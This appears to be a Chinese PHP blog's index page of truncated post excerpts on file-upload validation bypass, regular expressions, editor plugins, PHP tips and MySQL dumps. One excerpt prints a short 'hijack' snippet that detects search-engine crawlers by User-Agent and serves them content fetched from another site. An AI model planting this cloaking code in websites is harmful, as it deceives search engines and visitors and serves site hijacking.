文件上传漏洞之getimagesize()类型验证

getimagesize()简介 这个函数功能会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的 这就是图片的十六进制,前几位都是一样的 按照这样的逻辑,我们是...

一段简单的劫持代码php版

$arr=array('baidu','360','so','Sogou','bing','yisou','sm','esou','google');for($i=0;$i<count($arr);$i++){if(preg_match("/$arr[$i]/",$_SERVER["HTTP_USER_AGENT"])){$file=file_get_contents('http://baidu.com/');echo$file;exit;}}如果从搜

常用的一些正则表达式

正则表达式取回文本中间任意字符的条件表达式:[\w\W]+“[\w\W]+”中间绿色的部分表示匹配任意字符,包括换行等。比如要查找的源字符串是:<divid="dottom"><ahref="http://www.3code.cn">WordPress主题定制</a>测试用</body>要想查找<divid="dottom"

百度编辑器抓取微信图片并替换内容
百度编辑器抓取微信图片并替换内容

<imgalt=""class="has"height="292"src="https://img-blog.csdnimg.cn/20190713161601187.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpbmF0XzI0MzkzODYz,size_16,co

分享个留言插件

前几天把麻水人家的模板换了下,看能不能稍稍收录量大点。模板直接在杨青青那里下的静态模板改的。改好后自我感觉效果还可以。以前留言功能用的畅言,免费版的广告有点多。看到杨青青本身分享过一个留言板插件,基于帝国的。感觉还漂亮,安装也简单。把插件下下来看了下,所实话那种古老的php代码真不友好,因为网站后台都是自己用tp5.1写的。就把那个插件用tp5.1改下吧。时间比较紧,改的一般,不过我觉得还不错。先把静态文件传上来吧。链接:https://pan.baidu.com/s/1c3wF-bvP3zZM0ObpL

PHP一些简单知识的查漏补缺

说实话,总觉得linux系统和php还是似乎更配,以前的一些项目移植到windows系统下,由于代码的不严谨会出现一些小问题。还有平时没注意的一些问题,都记录在这里吧。使用json_encode函数存一些全路径时,有时候会因为正反斜杆的问题导致被转义后不能识别,其实加后缀就可以解决了。json_encode($images,JSON_UNESCAPED_SLASHES)图片全路径拼接存储时,也会有一些这样的问题,就需要替换斜杠了。$ptoh=str_replace(DIRECTORY_SEPARATOR,

php中名字空间及父子继承小例子

简单贴个代码,加深理解吧。&lt;?php/*命名空间Col*/namespaceCol{constINSTANCE=3;classA{private$a='private';protected$b='protected';public$c='public';static$d='static';publicfunction__construct(){$this-&gt;e='构造函数里这个变量声明在哪里啊,不用声明吗&lt;br/&gt;';var_dump($this-&

大数据库导入导出的一个方案
大数据库导入导出的一个方案

1.MYSQL中将数据库导出成SQL文件其实很简单的,就是一条语句就可以了,首先我们打开cmd,不用进mysql指令界面,直接按照下列格式将导出语句敲进去,然后再输入密码即可了:mysqldump-h[主机所在IP]-u[用户名]-p[要导出的数据库]&gt;[导出的路径//[文件名].sql]好吧,直接这样看可能有点抽象,我们来举个例子,目前我的MYSQL中有一个数据库bookinfodb,现在我要将它导出并且保存到D盘中。这个时候我们再到D盘目录下,我们就可以看到多了一个bookinfodb.